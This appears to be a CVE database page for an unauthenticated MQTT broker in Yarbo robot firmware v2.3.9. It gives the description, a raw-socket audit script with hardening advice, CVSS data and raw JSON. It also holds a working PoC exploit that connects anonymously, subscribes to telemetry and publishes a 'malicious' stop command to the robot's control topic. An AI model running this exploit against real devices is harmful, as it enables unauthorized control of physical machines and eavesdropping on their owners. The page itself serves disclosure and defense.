Security Vulnerability Report
CVE-2026-7415 CVSS 9.8 CRITICAL


Published: 2026-05-07 17:16:00
Last Modified: 2026-05-07 18:46:26

Description

The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind.
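The two conditions named above, anonymous CONNECT and unrestricted topic access, can be verified directly from the broker's return codes. The following is an added example, not part of the original report and not Yarbo's or the referenced researcher's code: it hand-builds MQTT 3.1.1 CONNECT and SUBSCRIBE packets with no credentials and classifies the CONNACK and SUBACK the broker sends back. The target address, port, client ID and the `yarbo/telemetry/#` filter are assumptions for illustration; the packet layouts and return codes are from the MQTT 3.1.1 specification.

```python
"""Raw MQTT 3.1.1 anonymous-access and subscription check (added example; not
Yarbo's code). Host, port, client ID and topic filter are assumptions."""
import socket
import struct
import sys

# CONNACK return codes (MQTT 3.1.1, section 3.2.2.3)
CONNACK_CODES = {
    0: "accepted (anonymous CONNECT allowed)",
    1: "unacceptable protocol version",
    2: "identifier rejected",
    3: "server unavailable",
    4: "bad user name or password",
    5: "not authorized (anonymous CONNECT refused)",
}

def encode_remaining_length(n: int) -> bytes:
    """Variable-length integer from MQTT 3.1.1, section 2.2.3."""
    out = bytearray()
    while True:
        byte = n % 128
        n //= 128
        if n > 0:
            byte |= 0x80
        out.append(byte)
        if n == 0:
            return bytes(out)

def utf8_string(s: str) -> bytes:
    """Length-prefixed UTF-8 string (MQTT 3.1.1, section 1.5.3)."""
    data = s.encode("utf-8")
    return struct.pack("!H", len(data)) + data

def build_connect(client_id: str = "acl-audit", keepalive: int = 30) -> bytes:
    """CONNECT with clean session and no username/password flags (flags byte 0x02)."""
    var_header = utf8_string("MQTT") + bytes([4, 0x02]) + struct.pack("!H", keepalive)
    body = var_header + utf8_string(client_id)
    return bytes([0x10]) + encode_remaining_length(len(body)) + body

def build_subscribe(topic_filter: str, packet_id: int = 1) -> bytes:
    """SUBSCRIBE for one topic filter at QoS 0 (fixed header 0x82)."""
    body = struct.pack("!H", packet_id) + utf8_string(topic_filter) + b"\x00"
    return bytes([0x82]) + encode_remaining_length(len(body)) + body

def parse_connack(pkt: bytes) -> dict:
    """CONNACK is 0x20 0x02 <ack flags> <return code>."""
    if len(pkt) < 4 or pkt[0] != 0x20 or pkt[1] != 2:
        raise ValueError("not a CONNACK packet")
    code = pkt[3]
    return {"accepted": code == 0, "code": code, "reason": CONNACK_CODES.get(code, "reserved")}

def parse_suback(pkt: bytes) -> dict:
    """SUBACK return code 0x80 means the subscription was refused (e.g. by an ACL)."""
    if len(pkt) < 5 or pkt[0] != 0x90:
        raise ValueError("not a SUBACK packet")
    packet_id = struct.unpack("!H", pkt[2:4])[0]
    return {"packet_id": packet_id, "granted": pkt[4] != 0x80, "code": pkt[4]}

def read_packet(f) -> bytes:
    """Read one control packet from a binary stream: header byte, varint length, body."""
    def take(n: int) -> bytes:
        data = f.read(n)
        if len(data) < n:
            raise ConnectionError("broker closed the connection")
        return data
    raw = bytearray(take(1))
    length, mult = 0, 1
    while True:
        b = take(1)
        raw += b
        length += (b[0] & 0x7F) * mult
        if not b[0] & 0x80:
            break
        mult *= 128
    return bytes(raw + take(length))

def audit_broker(host: str, port: int = 1883,
                 topic_filter: str = "yarbo/telemetry/#", timeout: float = 5.0) -> dict:
    """Connect with no credentials, then try to subscribe; report what the broker allowed."""
    result = {"anonymous_connect": False, "connack": "", "subscribe_granted": False}
    with socket.create_connection((host, port), timeout=timeout) as sock:
        stream = sock.makefile("rb")
        sock.sendall(build_connect())
        connack = parse_connack(read_packet(stream))
        result["anonymous_connect"], result["connack"] = connack["accepted"], connack["reason"]
        if connack["accepted"]:
            sock.sendall(build_subscribe(topic_filter))
            pkt = read_packet(stream)
            while pkt[0] & 0xF0 != 0x90:  # retained PUBLISHes may arrive before the SUBACK
                pkt = read_packet(stream)
            result["subscribe_granted"] = parse_suback(pkt)["granted"]
            sock.sendall(b"\xe0\x00")  # DISCONNECT
    return result

if __name__ == "__main__":
    print(audit_broker(sys.argv[1] if len(sys.argv) > 1 else "192.168.1.100"))  # assumed address
```

A CONNACK return code of 5 (not authorized) means the broker refuses clients that present no credentials; 0 means it accepted the unauthenticated session, which is the first half of this finding. If the connect succeeds, a SUBACK return code of 0x80 means the subscription was refused, which is what a topic-level ACL produces; a broker with no ACLs grants any valid filter, including the wildcard. The page does not say which broker software the firmware embeds; on Mosquitto, the corresponding hardening is `allow_anonymous false` together with an `acl_file` that grants each client read or write on only the topics it needs.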

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Weakness: CWE-306 (Missing Authentication for Critical Function)

Configurations (Affected Products)

No NVD configuration (CPE) data is available yet; the record status is "Awaiting Analysis".

Affected product per the description: Yarbo firmware v2.3.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import time

import paho.mqtt.client as mqtt

# Configuration
TARGET_IP = "192.168.1.100"            # Replace with the target Yarbo device IP
PORT = 1883
CONTROL_TOPIC = "yarbo/control/move"   # Example control topic
TELEMETRY_TOPIC = "yarbo/telemetry/#"  # Example telemetry topic


# Callback when the connection is established
def on_connect(client, userdata, flags, rc):
    # rc 0 means the broker accepted a CONNECT carrying no credentials
    print(f"[+] Connected with result code {rc}")
    # Subscribe to sensitive telemetry topics
    client.subscribe(TELEMETRY_TOPIC)
    print(f"[+] Subscribed to: {TELEMETRY_TOPIC}")


# Callback when a message is received
def on_message(client, userdata, msg):
    print(f"[+] Received message on {msg.topic}: {msg.payload.decode(errors='replace')}")


def main():
    # paho-mqtt 2.x requires an explicit callback API version; 1.x has no such argument
    try:
        client = mqtt.Client(mqtt.CallbackAPIVersion.VERSION1)
    except AttributeError:
        client = mqtt.Client()
    client.on_connect = on_connect
    client.on_message = on_message

    try:
        # Connect to the broker anonymously (no username/password)
        print(f"[*] Attempting to connect to {TARGET_IP}:{PORT}...")
        client.connect(TARGET_IP, PORT, 60)

        # Start the loop to process network traffic
        client.loop_start()

        # Wait a bit for the connection to establish
        time.sleep(2)

        # Attack: publish a control command without authentication
        malicious_payload = "{\"command\": \"stop\", \"reason\": \"attack\"}"
        print(f"[*] Sending malicious payload to {CONTROL_TOPIC}: {malicious_payload}")
        client.publish(CONTROL_TOPIC, malicious_payload)

        # Keep listening for a few seconds
        time.sleep(5)
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        client.loop_stop()
        client.disconnect()
        print("[*] Disconnected.")


if __name__ == "__main__":
    main()

References

https://github.com/Bin4ry/yarbo-nat-in-my-back-yard
https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111100111111111110000000000000000000000000000000000000000000000000000001001

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-7415",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-07T17:15:59.570",
    "lastModified": "2026-05-07T18:46:25.867",
    "vulnStatus": "Awaiting Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The MQTT broker embedded in Yarbo firmware v2.3.9 is configured to allow anonymous connections with no topic-level read or write ACLs. Any host on the same network can subscribe to sensitive telemetry topics or publish control messages directly to the robot without authentication or authorization of any kind."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-306"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard",
        "source": "[email protected]"
      },
      {
        "url": "https://takeonme.org/gcves/GCVE-1337-2026-00000000000000000000000000000000000000000000000000111111111100111111111110000000000000000000000000000000000000000000000000000001001",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/Bin4ry/yarbo-nat-in-my-back-yard",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}